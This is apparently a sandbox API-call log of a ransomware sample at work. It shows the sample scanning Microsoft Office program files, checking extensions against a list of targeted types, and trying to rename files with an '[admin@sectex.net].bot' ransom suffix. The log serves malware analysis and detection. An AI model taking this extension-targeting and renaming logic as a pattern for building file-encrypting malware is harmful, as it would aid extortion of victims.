	[0168.861] lstrlenW (lpString=".doc") returned 4
	[0168.861] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString=".docx") returned 5
	[0168.861] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0168.861] lstrlenW (lpString=".pdf") returned 4
	[0168.861] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString=".xls") returned 4
	[0168.861] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString=".xlsx") returned 5
	[0168.861] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0168.861] lstrlenW (lpString=".ppt") returned 4
	[0168.861] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.862] lstrlenW (lpString=".zip") returned 4
	[0168.862] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0168.862] lstrlenW (lpString=".rar") returned 4
	[0168.862] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0168.862] lstrlenW (lpString=".bz2") returned 4
	[0168.862] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0168.862] lstrlenW (lpString=".7z") returned 3
	[0168.862] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0168.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.862] lstrlenW (lpString=".dbf") returned 4
	[0168.862] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0168.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.862] lstrlenW (lpString=".1cd") returned 4
	[0168.862] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0168.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.862] lstrlenW (lpString=".jpg") returned 4
	[0168.862] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0168.862] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0168.862] lstrlenW (lpString="GFX.DLL") returned 7
	[0168.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.864] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2542440) returned 1
	[0168.864] CloseHandle (hObject=0x3a4) returned 1
	[0168.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll")) returned 0x20
	[0168.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0168.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.865] lstrlenW (lpString=".doc") returned 4
	[0168.865] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0168.865] lstrlenW (lpString=".docx") returned 5
	[0168.866] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0168.866] lstrlenW (lpString=".pdf") returned 4
	[0168.866] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0168.866] lstrlenW (lpString=".xls") returned 4
	[0168.866] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0168.866] lstrlenW (lpString=".xlsx") returned 5
	[0168.866] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0168.866] lstrlenW (lpString=".ppt") returned 4
	[0168.866] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0168.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.866] lstrlenW (lpString=".zip") returned 4
	[0168.866] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0168.866] lstrlenW (lpString=".rar") returned 4
	[0168.866] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0168.866] lstrlenW (lpString=".bz2") returned 4
	[0168.866] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0168.866] lstrlenW (lpString=".7z") returned 3
	[0168.866] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0168.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.866] lstrlenW (lpString=".dbf") returned 4
	[0168.866] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0168.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.866] lstrlenW (lpString=".1cd") returned 4
	[0168.866] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0168.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.866] lstrlenW (lpString=".jpg") returned 4
	[0168.866] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0168.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.866] lstrlenW (lpString=".doc") returned 4
	[0168.866] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0168.866] lstrlenW (lpString=".docx") returned 5
	[0168.866] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0168.866] lstrlenW (lpString=".pdf") returned 4
	[0168.867] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0168.867] lstrlenW (lpString=".xls") returned 4
	[0168.867] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0168.867] lstrlenW (lpString=".xlsx") returned 5
	[0168.867] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0168.867] lstrlenW (lpString=".ppt") returned 4
	[0168.867] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0168.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.867] lstrlenW (lpString=".zip") returned 4
	[0168.867] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0168.867] lstrlenW (lpString=".rar") returned 4
	[0168.867] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0168.867] lstrlenW (lpString=".bz2") returned 4
	[0168.867] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0168.867] lstrlenW (lpString=".7z") returned 3
	[0168.867] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0168.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.867] lstrlenW (lpString=".dbf") returned 4
	[0168.867] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0168.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.867] lstrlenW (lpString=".1cd") returned 4
	[0168.867] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0168.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 50
	[0168.867] lstrlenW (lpString=".jpg") returned 4
	[0168.867] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0168.867] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0168.867] lstrlenW (lpString="GKExcel.dll") returned 11
	[0168.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.880] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=4563328) returned 1
	[0168.880] CloseHandle (hObject=0x3a4) returned 1
	[0168.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll")) returned 0x20
	[0168.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0168.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.880] lstrlenW (lpString=".doc") returned 4
	[0168.880] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0168.880] lstrlenW (lpString=".docx") returned 5
	[0168.880] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0168.880] lstrlenW (lpString=".pdf") returned 4
	[0168.880] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0168.880] lstrlenW (lpString=".xls") returned 4
	[0168.880] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString=".xlsx") returned 5
	[0168.881] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0168.881] lstrlenW (lpString=".ppt") returned 4
	[0168.881] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.881] lstrlenW (lpString=".zip") returned 4
	[0168.881] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString=".rar") returned 4
	[0168.881] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString=".bz2") returned 4
	[0168.881] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0168.881] lstrlenW (lpString=".7z") returned 3
	[0168.881] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0168.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.881] lstrlenW (lpString=".dbf") returned 4
	[0168.881] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0168.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.881] lstrlenW (lpString=".1cd") returned 4
	[0168.881] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0168.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.881] lstrlenW (lpString=".jpg") returned 4
	[0168.881] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.881] lstrlenW (lpString=".doc") returned 4
	[0168.881] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString=".docx") returned 5
	[0168.881] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0168.881] lstrlenW (lpString=".pdf") returned 4
	[0168.881] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString=".xls") returned 4
	[0168.881] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0168.881] lstrlenW (lpString=".xlsx") returned 5
	[0168.882] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0168.882] lstrlenW (lpString=".ppt") returned 4
	[0168.882] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0168.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.882] lstrlenW (lpString=".zip") returned 4
	[0168.882] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0168.882] lstrlenW (lpString=".rar") returned 4
	[0168.882] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0168.882] lstrlenW (lpString=".bz2") returned 4
	[0168.882] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0168.882] lstrlenW (lpString=".7z") returned 3
	[0168.882] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0168.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.882] lstrlenW (lpString=".dbf") returned 4
	[0168.882] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0168.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.882] lstrlenW (lpString=".1cd") returned 4
	[0168.882] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0168.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 54
	[0168.882] lstrlenW (lpString=".jpg") returned 4
	[0168.882] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0168.882] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0168.882] lstrlenW (lpString="GKPowerPoint.dll") returned 16
	[0168.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.883] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2780032) returned 1
	[0168.883] CloseHandle (hObject=0x3a4) returned 1
	[0168.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll")) returned 0x20
	[0168.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.883] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0168.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.883] lstrlenW (lpString=".doc") returned 4
	[0168.883] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0168.883] lstrlenW (lpString=".docx") returned 5
	[0168.883] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0168.883] lstrlenW (lpString=".pdf") returned 4
	[0168.884] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString=".xls") returned 4
	[0168.884] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString=".xlsx") returned 5
	[0168.884] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0168.884] lstrlenW (lpString=".ppt") returned 4
	[0168.884] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.884] lstrlenW (lpString=".zip") returned 4
	[0168.884] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString=".rar") returned 4
	[0168.884] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString=".bz2") returned 4
	[0168.884] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0168.884] lstrlenW (lpString=".7z") returned 3
	[0168.884] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0168.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.884] lstrlenW (lpString=".dbf") returned 4
	[0168.884] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0168.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.884] lstrlenW (lpString=".1cd") returned 4
	[0168.884] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0168.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.884] lstrlenW (lpString=".jpg") returned 4
	[0168.884] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.884] lstrlenW (lpString=".doc") returned 4
	[0168.884] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString=".docx") returned 5
	[0168.884] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0168.884] lstrlenW (lpString=".pdf") returned 4
	[0168.884] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0168.884] lstrlenW (lpString=".xls") returned 4
	[0168.884] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0168.885] lstrlenW (lpString=".xlsx") returned 5
	[0168.885] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0168.885] lstrlenW (lpString=".ppt") returned 4
	[0168.885] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0168.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.885] lstrlenW (lpString=".zip") returned 4
	[0168.885] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0168.885] lstrlenW (lpString=".rar") returned 4
	[0168.885] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0168.885] lstrlenW (lpString=".bz2") returned 4
	[0168.885] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0168.885] lstrlenW (lpString=".7z") returned 3
	[0168.885] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0168.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.885] lstrlenW (lpString=".dbf") returned 4
	[0168.885] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0168.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.885] lstrlenW (lpString=".1cd") returned 4
	[0168.885] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0168.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 59
	[0168.885] lstrlenW (lpString=".jpg") returned 4
	[0168.885] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0168.885] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0168.885] lstrlenW (lpString="GKWord.dll") returned 10
	[0168.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.890] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=3114368) returned 1
	[0168.890] CloseHandle (hObject=0x3a4) returned 1
	[0168.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll")) returned 0x20
	[0168.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.890] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0168.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.891] lstrlenW (lpString=".doc") returned 4
	[0168.891] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0168.891] lstrlenW (lpString=".docx") returned 5
	[0168.891] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1
	[0168.891] lstrlenW (lpString=".pdf") returned 4
	[0168.891] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0168.891] lstrlenW (lpString=".xls") returned 4
	[0168.891] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0168.891] lstrlenW (lpString=".xlsx") returned 5
	[0168.891] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1
	[0168.891] lstrlenW (lpString=".ppt") returned 4
	[0168.891] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0168.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.891] lstrlenW (lpString=".zip") returned 4
	[0168.891] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0168.891] lstrlenW (lpString=".rar") returned 4
	[0168.891] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0168.891] lstrlenW (lpString=".bz2") returned 4
	[0168.891] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0168.891] lstrlenW (lpString=".7z") returned 3
	[0168.891] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0168.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.891] lstrlenW (lpString=".dbf") returned 4
	[0168.891] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0168.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.891] lstrlenW (lpString=".1cd") returned 4
	[0168.891] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0168.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.891] lstrlenW (lpString=".jpg") returned 4
	[0168.891] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0168.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.892] lstrlenW (lpString=".doc") returned 4
	[0168.892] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0168.892] lstrlenW (lpString=".docx") returned 5
	[0168.892] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1
	[0168.892] lstrlenW (lpString=".pdf") returned 4
	[0168.892] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0168.892] lstrlenW (lpString=".xls") returned 4
	[0168.892] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0168.892] lstrlenW (lpString=".xlsx") returned 5
	[0168.892] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1
	[0168.892] lstrlenW (lpString=".ppt") returned 4
	[0168.892] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0168.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.892] lstrlenW (lpString=".zip") returned 4
	[0168.892] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0168.892] lstrlenW (lpString=".rar") returned 4
	[0168.892] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0168.892] lstrlenW (lpString=".bz2") returned 4
	[0168.892] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0168.892] lstrlenW (lpString=".7z") returned 3
	[0168.892] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0168.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.892] lstrlenW (lpString=".dbf") returned 4
	[0168.892] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0168.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.892] lstrlenW (lpString=".1cd") returned 4
	[0168.892] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0168.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 53
	[0168.892] lstrlenW (lpString=".jpg") returned 4
	[0168.892] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0168.893] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0168.893] lstrlenW (lpString="GRAPH.EXE") returned 9
	[0168.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.896] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6437760) returned 1
	[0168.897] CloseHandle (hObject=0x3a4) returned 1
	[0168.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe")) returned 0x20
	[0168.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.897] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0168.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE") returned 52
	[0168.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE") returned 52
